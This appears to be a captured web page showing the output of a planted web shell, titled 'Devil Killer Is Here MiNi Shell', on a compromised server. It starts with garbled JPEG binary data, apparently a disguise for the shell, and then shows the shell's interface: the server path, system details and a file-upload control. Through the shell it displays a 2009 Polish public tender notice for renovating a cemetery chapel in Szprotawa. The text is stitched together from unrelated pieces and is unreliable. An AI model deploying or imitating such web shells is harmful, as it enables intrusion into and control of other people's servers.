JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/110052-N-2009.html

<p class="kh_header"><b>Szprotawa: Remont kaplicy cmentarnej przy cmentarzu komunalnym    w Szprotawie.</b><br>
<b>Numer ogłoszenia: 110052 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski Szprotowa , Rynek 45, 67-300 Szprotawa, woj. lubuskie, tel. 068 3760772.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont kaplicy cmentarnej przy cmentarzu komunalnym    w Szprotawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Zakres przedmiotu zamówienia

 Remont budynku kaplicy cmentarnej na cmentarzu komunalnym w Szprotawie.

Zakres remontu obejmuje:

Część I zamówienia- wymiana okien i drzwi kaplicy

Wymiana stolarki okiennej ( na drewniane brązowe szklone szybą ornamentową, przed wykonywaniem okien dokonać pomiarów ) wraz z obróbką ościeży - okna według załączonych szkiców 
-Wymiana stolarki drzwiowej wraz z obróbką ościeży (na drewniane, kolor brązowy -przed wykonaniem dokonać pomiarów) drzwi według załączonych szkiców


Część II zamówienia-  Elewacja, odwodnienie, sanitariaty, nawierzchnie

Elewacja:
-Zbicie ok. 30% tynków zewnętrznych budynku kaplicy
-Uzupełnienie wszystkich ubytków w murach
-Wykonanie nowych tynków ok. 30%
- Przygotowanie tynków  do malowania (przecieranie na gładko)
-Malowanie budynku farbami sylikonowymi
-Wykonanie zadaszenia z poliwęglanu na konstrukcji stalowej (2x3 m)
-Opalanie starej farby, przygotowanie do malowania i dwukrotne malowanie pozostałych niewymienionych drzwi  ( 6 sztuk),oraz szafek.
 

Odwodnienie:
-Wykonanie odwodnienia budynku poprzez odprowadzenie wód opadowych z rynien na odległość bezpieczną dla budynku. Odwodnienie wykonać poprzez  ułożenie na odpowiedniej głębokości rur PVC  110 mm  i montaż  czyszczaków.

Schody, plac oraz chodniki:
- Rozebranie betonowych schodów wejściowych, chodników dookoła kaplicy oraz nawierzchni placu z tyłu kaplicy z płytek betonowych.
-Wykonanie koryta o gł. ok. 20 cm w projektowanych  miejscach pod kostkę betonową .
-Ułożenie obrzeży na  podsypce cementowo piaskowej
-Wykonanie podbudowy z kruszywa łamanego gr. warstwy 8 cm.  
- Na przygotowanej podbudowie wykonać schody z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej w miejscu rozebranych schodów przed głównym wejściem do kaplicy
-Ułożenie kostki betonowej gr 8 cm na podsypce cementowo piaskowej  na placu z tyłu kaplicy i na podjeżdzie.  
- Zakres według dołączonej mapki

Sanitariaty:
-Wymiana muszli klozetowych  3 szt.
-Wymiana płuczek ustępowych z zaworem pływakowym 3 szt. oraz zaworu płuczek 3 szt.
-Wymiana umywalek wraz z mocowaniem i syfonami 2 szt. oraz wymiana baterii umywalkowych z ruchomą wylewka 2 szt.
-Wymiana kompletu pisuarowego wraz z syfonem 1 szt.
-Przygotowanie powierzchni ścian do malowania  wraz z przeszpachlowaniem nierówności.
-Malowanie dwukrotne ścian farbami emulsyjnymi
-Malowanie dwukrotne ścian farbami olejnymi.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą oferenci spełniający warunki wynikające z art. 22 ust.1 ustawy z dnia 29 stycznia 2004r  z późn. zm. Prawo zamówień publicznych, czyli:

 1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli    
  ustawy nakładają obowiązek posiadania takich uprawnień

2.Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny (tj. wykonali przynajmniej jedną robotę budowlane o zakresie zbliżonym co do zakresu  przedmiotu zamówienia w okresie 5 ostatnich lat. Przez zakres podobny Zamawiający będzie rozumiał wykonanie w okresie 5 ostatnich lat przynajmniej jednej  roboty, której  przedmiotem były: w zakresie części II zamówienia: roboty remontowe budynku obejmujące swoim zakresem wykonanie tynków, roboty malarskie w zakresie części I zamówienia: montaż stolarki okiennej i drzwiowej,  a także  dysponują osobami zdolnymi do wykonania zamówienia (dysponują następującymi osobami: kierownik budowy  z uprawnieniami  o specjalności konstrukcyjno budowlanej,)

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie                      zamówienia 

4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia według paragrafu  24 ust.1 i 2 prawa zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - formularz ofertowy z wykorzystaniem załączonego wzoru
- informacja ogólna o oferencie - załącznik nr 1
- kosztorys ofertowy zał. nr 6
-zaakceptowany wzór umowy -załącznik nr 5
1.2 W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r z późn. zm. Prawo zamówień publicznych, Wykonawca składa następujące dokumenty: 
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 

 1.3 W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty:
- wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności zał.
nr 3, załącznik powinien zawierać przynajmniej następujące osoby: 
a)	kierownik budowy z uprawnieniami o specjalności konstrukcyjno -budowlanej, do kierowania, nadzorowania i kontrolowania budowy i robót wraz z ważnym zaświadczeniem z Izby Inżynierów Budownictwa 


-wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych ( z uwzględnieniem rozdziału II pkt 2 niniejszej SIWZ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem wartości, zakresu, daty i miejsca wykonania robót, Załącznik nr 4 z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (referencje). Referencje muszą umożliwiać ich weryfikację, zawierać nr telefonu do osoby wystawiającej;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szprotawa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szprotawie
Rynek 45
67-300 Szprotawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 12:00, miejsce: Urząd Miejski w Szprotawie
Rynek 45
67-300 Szprotawa
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I zamówienia- wymiana okien i drzwi kaplicy

Wymiana stolarki okiennej ( na drewniane brązowe szklone szybą ornamentową, przed wykonywaniem okien dokonać pomiarów ) wraz z obróbką ościeży - okna według załączonych szkiców 
-Wymiana stolarki drzwiowej wraz z obróbką ościeży (na drewniane, kolor brązowy -przed wykonaniem dokonać pomiarów) drzwi według załączonych szkiców.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia-  Elewacja, odwodnienie, sanitariaty, nawierzchnie

Elewacja:
-Zbicie ok. 30% tynków zewnętrznych budynku kaplicy
-Uzupełnienie wszystkich ubytków w murach
-Wykonanie nowych tynków ok. 30%
- Przygotowanie tynków  do malowania (przecieranie na gładko)
-Malowanie budynku farbami sylikonowymi
-Wykonanie zadaszenia z poliwęglanu na konstrukcji stalowej (2x3 m)
-Opalanie starej farby, przygotowanie do malowania i dwukrotne malowanie pozostałych niewymienionych drzwi  ( 6 sztuk),oraz szafek.
 

Odwodnienie:
-Wykonanie odwodnienia budynku poprzez odprowadzenie wód opadowych z rynien na odległość bezpieczną dla budynku. Odwodnienie wykonać poprzez  ułożenie na odpowiedniej głębokości rur PVC  110 mm  i montaż  czyszczaków.

Schody, plac oraz chodniki:
- Rozebranie betonowych schodów wejściowych, chodników dookoła kaplicy oraz nawierzchni placu z tyłu kaplicy z płytek betonowych.
-Wykonanie koryta o gł. ok. 20 cm w projektowanych  miejscach pod kostkę betonową .
-Ułożenie obrzeży na  podsypce cementowo piaskowej
-Wykonanie podbudowy z kruszywa łamanego gr. warstwy 8 cm.  
- Na przygotowanej podbudowie wykonać schody z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej w miejscu rozebranych schodów przed głównym wejściem do kaplicy
-Ułożenie kostki betonowej gr 8 cm na podsypce cementowo piaskowej  na placu z tyłu kaplicy i na podjeżdzie.  
- Zakres według dołączonej mapki

Sanitariaty:
-Wymiana muszli klozetowych  3 szt.
-Wymiana płuczek ustępowych z zaworem pływakowym 3 szt. oraz zaworu płuczek 3 szt.
-Wymiana umywalek wraz z mocowaniem i syfonami 2 szt. oraz wymiana baterii umywalkowych z ruchomą wylewka 2 szt.
-Wymiana kompletu pisuarowego wraz z syfonem 1 szt.
-Przygotowanie powierzchni ścian do malowania  wraz z przeszpachlowaniem nierówności.
-Malowanie dwukrotne ścian farbami emulsyjnymi
-Malowanie dwukrotne ścian farbami olejnymi.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com